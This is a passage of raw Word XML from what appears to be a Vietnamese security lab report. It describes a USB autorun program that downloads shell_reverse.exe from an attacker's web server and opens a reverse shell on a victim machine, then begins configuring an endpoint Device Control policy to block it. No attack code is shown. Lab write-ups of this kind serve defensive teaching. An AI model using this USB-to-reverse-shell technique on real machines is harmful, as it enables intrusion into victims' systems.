        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E294670" wp14:editId="2EACA971">
            <wp:extent cx="5943600" cy="2636520"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="11430"/>
            <wp:docPr id="820923116" name="Picture 820923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3116" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId59"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2636520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0126DAE1" w14:textId="53F64D8C" w:rsidR="00AF0D8F" w:rsidRPr="00F97D30" w:rsidRDefault="00AF0D8F" w:rsidP="00F97D30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Một</w:t>
      </w:r>
      <w:r w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> bên khác, u</w:t>
      </w:r>
      <w:r w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>pload malware lên Web Server đã được build sẵn ở máy Attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D542BF2" w14:textId="1DD209F0" w:rsidR="00AF0D8F" w:rsidRPr="00F0566E" w:rsidRDefault="00C177DC" w:rsidP="00F97D30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C177DC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DD409BE" wp14:editId="127CDE3E">
            <wp:extent cx="5943600" cy="2625725"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="22225"/>
            <wp:docPr id="2128968658" name="Picture 2128968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8658" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId60"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2625725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="623B8AF7" w14:textId="2C2EFF71" w:rsidR="00CB3107" w:rsidRPr="00CB3107" w:rsidRDefault="00CB3107" w:rsidP="00F97D30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Thực</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> hiện tấn công trên máy nạn nhân</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16015904" w14:textId="4D2DCB5F" w:rsidR="00E2248E" w:rsidRPr="00F97D30" w:rsidRDefault="00E57C47" w:rsidP="00F97D30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Bên máy nạn nhân, thực hiện cắm USB đã có </w:t>
      </w:r>
      <w:r w:rsidR="009E7C3F" w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>chứ</w:t>
      </w:r>
      <w:r w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="009E7C3F" w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> sẵn</w:t>
      </w:r>
      <w:r w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> chương trình </w:t>
      </w:r>
      <w:r w:rsidR="00260D02" w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>tự động</w:t>
      </w:r>
      <w:r w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> thực </w:t>
      </w:r>
      <w:r w:rsidR="00260D02" w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>thi khi</w:t>
      </w:r>
      <w:r w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C7037F" w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">kết nối, thực </w:t>
      </w:r>
      <w:r w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">hiện tải </w:t>
      </w:r>
      <w:r w:rsidR="00260D02" w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">file </w:t>
      </w:r>
      <w:r w:rsidR="00C7037F" w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>shell_reverse.exe trên dịch vụ web của attacker</w:t>
      </w:r>
      <w:r w:rsidR="00F97D30" w:rsidRPr="009361BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFB6551" w14:textId="257DBAED" w:rsidR="00E46E7F" w:rsidRDefault="00E46E7F" w:rsidP="00F97D30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E46E7F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:noProof/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6378EA51" wp14:editId="5730C20C">
            <wp:extent cx="5943600" cy="2482850"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="12700"/>
            <wp:docPr id="1445076847" name="Picture 1445076847"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6847" name="Picture 1" descr="A computer screen with a black screen&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId61"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2482850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBE459B" w14:textId="2AC42550" w:rsidR="002246AB" w:rsidRPr="00F97D30" w:rsidRDefault="002246AB" w:rsidP="00F97D30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Lúc này attacker đã thực hiện tấn công revers shell thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC4D799" w14:textId="6FE35DDF" w:rsidR="00E46E7F" w:rsidRPr="00F0566E" w:rsidRDefault="002246AB" w:rsidP="00F97D30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002246AB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:noProof/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00953558" wp14:editId="4E1FDB1D">
            <wp:extent cx="5943600" cy="2626360"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="21590"/>
            <wp:docPr id="912881973" name="Picture 912881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1973" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId62"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2626360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFE310F" w14:textId="71914F00" w:rsidR="002246AB" w:rsidRPr="00F0566E" w:rsidRDefault="00793AFA" w:rsidP="00F97D30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Để ngăn chặn </w:t>
      </w:r>
      <w:r w:rsidR="005F023B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">các </w:t>
      </w:r>
      <w:r w:rsidR="00FB3EF4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>cuộc tấn công như trên thực hiện</w:t>
      </w:r>
      <w:r w:rsidR="00BA38B3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>, trên Server</w:t>
      </w:r>
      <w:r w:rsidR="00FB3EF4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D861DF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">tạo tính năng bảo </w:t>
      </w:r>
      <w:r w:rsidR="004A5FEB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>mật:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0763423C" w14:textId="4C5363EE" w:rsidR="00E772C0" w:rsidRPr="00F97D30" w:rsidRDefault="0059114E" w:rsidP="00F97D30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Đầu tiên vào </w:t>
      </w:r>
      <w:r w:rsidR="005D67B6" w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Policies -&gt; </w:t>
      </w:r>
      <w:r w:rsidR="007F1DD7" w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Policy </w:t>
      </w:r>
      <w:r w:rsidR="009509BC" w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14245B34" w14:textId="6EFE4180" w:rsidR="004A5FEB" w:rsidRPr="00F97D30" w:rsidRDefault="00E772C0" w:rsidP="00F97D30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="008B2BAB" w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">ại giao diện này nhấn </w:t>
      </w:r>
      <w:r w:rsidRPr="00E772C0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A530098" wp14:editId="3B3FA168">
            <wp:extent cx="624894" cy="205758"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="1236937457" name="Picture 123693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7457" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId63"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="624894" cy="205758"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E34048" w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> để tạo chính sách mới</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D59D9FC" w14:textId="235AF3C7" w:rsidR="00E34048" w:rsidRPr="00F97D30" w:rsidRDefault="00E34048"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Tiếp theo click vào Targets -&gt; Manage targets và chọn Endpoint để deploy policy này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0C668D" w14:textId="1D913137" w:rsidR="00E34048" w:rsidRPr="00F97D30" w:rsidRDefault="00E34048"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Ta có thể chọn endpoint theo Host name, IP address và hệ điều hành.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C6E612" w14:textId="678451D2" w:rsidR="00E34048" w:rsidRPr="000D74A1" w:rsidRDefault="00B15546" w:rsidP="00F97D30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B15546">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66F6592D" wp14:editId="5EA9E670">
            <wp:extent cx="5943600" cy="1711960"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="21590"/>
            <wp:docPr id="1052173016" name="Picture 1052173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3016" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId64"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1711960"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7518E0" w14:textId="77777777" w:rsidR="00E34048" w:rsidRPr="000D74A1" w:rsidRDefault="00E34048" w:rsidP="0075136C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D74A1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Sau khi chọn được Endpoint mong muốn click vào Add specific targets -&gt; Ok</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79484F7E" w14:textId="66DF6006" w:rsidR="00E34048" w:rsidRPr="000D74A1" w:rsidRDefault="005803E7" w:rsidP="00F97D30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005803E7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2273B4DA" wp14:editId="37F93325">
            <wp:extent cx="5989320" cy="1912620"/>
            <wp:effectExtent l="19050" t="19050" r="11430" b="11430"/>
            <wp:docPr id="1282859180" name="Picture 1282859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9180" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId65"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5989320" cy="1912620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6CDE4D" w14:textId="0C5ED4A5" w:rsidR="00DA7049" w:rsidRPr="00F97D30" w:rsidRDefault="00DA7049" w:rsidP="00F97D30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Sau</w:t>
      </w:r>
      <w:r w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> đó vào mục Device Control </w:t>
      </w:r>
      <w:r w:rsidR="00FC76DF" w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>-&gt; Internal Agents</w:t>
      </w:r>
      <w:r w:rsidR="00877C46" w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; All users</w:t>
      </w:r>
      <w:r w:rsidR="00A524E9" w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>, ở đây sẽ thực hiện thêm chính sách</w:t>
      </w:r>
      <w:r w:rsidR="00FC76DF" w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
